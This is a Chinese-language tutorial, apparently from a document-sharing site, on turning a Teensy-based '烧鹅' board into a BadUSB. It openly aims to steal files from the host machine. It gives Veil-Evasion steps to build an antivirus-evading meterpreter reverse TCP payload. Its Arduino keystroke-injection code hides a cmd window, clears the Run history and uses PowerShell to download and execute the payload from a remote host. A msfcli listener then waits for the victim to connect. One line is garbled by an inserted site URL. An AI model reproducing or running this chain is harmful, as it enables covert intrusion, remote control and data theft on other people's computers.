当前位置：文档库 › 利用烧鹅制作简单BadUSB

利用烧鹅制作简单BadUSB

特别说明：使用这篇文档需要购买专门用于开发用的开发板，所以不懂的就直接略过吧。

用到的硬件设备为烧鹅，烧鹅是RadioWar基于Teensy++ 2.0AT90USB1286芯片设计的USB Rubber Ducky类开发板。感觉就是个Teensy2++和一个sd读卡器。这东西可以做什么呢，我目前的功能是在插上电脑的时候自动把电脑中我的文档中的文件和桌面上的文件复制到u盘，偷文件用，其实可以自定义更多。

先说下缺点：

1.这属于HID攻击，也就是模拟一个键盘，那么缺点就是有3秒左右的时间你不能操作电脑否则运行失败。

2.当要复制的文件很多或者这两个文件夹目录树太大的时候，速度比较慢，毕竟不能usb

3.0

3.你的sd卡名字要叫一个特殊的名字，要不代码找不到你的u盘盘符优点嘛，就是不管有没有开自动运行都能运行，因为这东西完全不靠自动运行

第一步利用veil编码打造免杀的meterpreter

root@kali:~# veil-evasion //启动veil

[>] Please enter a command: list //查看可选列表

26) python/meterpreter/rev_tcp

[>] Please enter a command: 26 //这里选择编号为26的payload [>] Please enter a command: set LHOST 192.168.31.233 //设置LHOST

[>] Please enter a command: generate //对payload进行编码[*] Press [enter] for 'payload'

[>] Please enter the base name for output files: a //输入生成的payload名字

[>] Please enter the number of your choice: 1 //选择编码方式

[*] Executable written to: /root/veil-output/compiled/a1.exe //生成经过编码的payload位置

第二步将执行代码写入badusb中

使用Arduino IDE 写入,其中下载使用的是PowerShell，如果使用vbs那种方法，360会报警.

void setup(){//初始化，这里的代码只执行一次

delay(5000);//设置延时，让系统有足够的时间识别烧鹅，防止后续代码执行错乱。

Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);// 按下Win键

Keyboard.set_key1(KEY_R);// 同时按下R键

Keyboard.send_now();// 发送Win+R

delay(100);

Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");

//开启极小的CMD窗口，设置文字和背景对比度尽可能相近，达到隐藏输入的目的Keyboard.set_key1(KEY_ENTER);

Keyboard.send_now();

delay(300);

Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\Cur rentVersion\\Explorer\\RunMRU /f");//利用注册表清除开始--运行的记录

Keyboard.set_key1(KEY_ENTER);

Keyboard.send_now();

Keyboard.println("powershell (new- object https://www.wendangku.net/doc/416193623.html,.WebClient).Down loadFile('http://192.168.1.100 /a1.exe','D:\\1.exe')");//下载远程的payl oad

Keyboard.set_key1(KEY_ENTER);

Keyboard.send_now();

Keyboard.set_modifier(0);

Keyboard.set_key1(0);

Keyboard.send_now();

delay(3000);//设置延迟，等待下载完成

Keyboard.println("d:\\1.exe");//执行打开命令

Keyboard.set_key1(KEY_ENTER);

delay(300);

Keyboard.set_modifier(0);

Keyboard.set_key1(0);

Keyboard.set_modifier(MODIFIERKEY_ALT);

Keyboard.set_key1(KEY_SPACE);

Keyboard.set_key2(KEY_C);

Keyboard.send_now();

Keyboard.set_modifier(0);

Keyboard.set_key1(0);

Keyboard.set_key2(0);

Keyboard.send_now();//关闭cmd窗口}

void loop()//循环，这里的代码无限循环{

}

第三步等待目标连接

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //开始监听,等待连接

将USB插入目标机器，执行相关命令

目标机器上线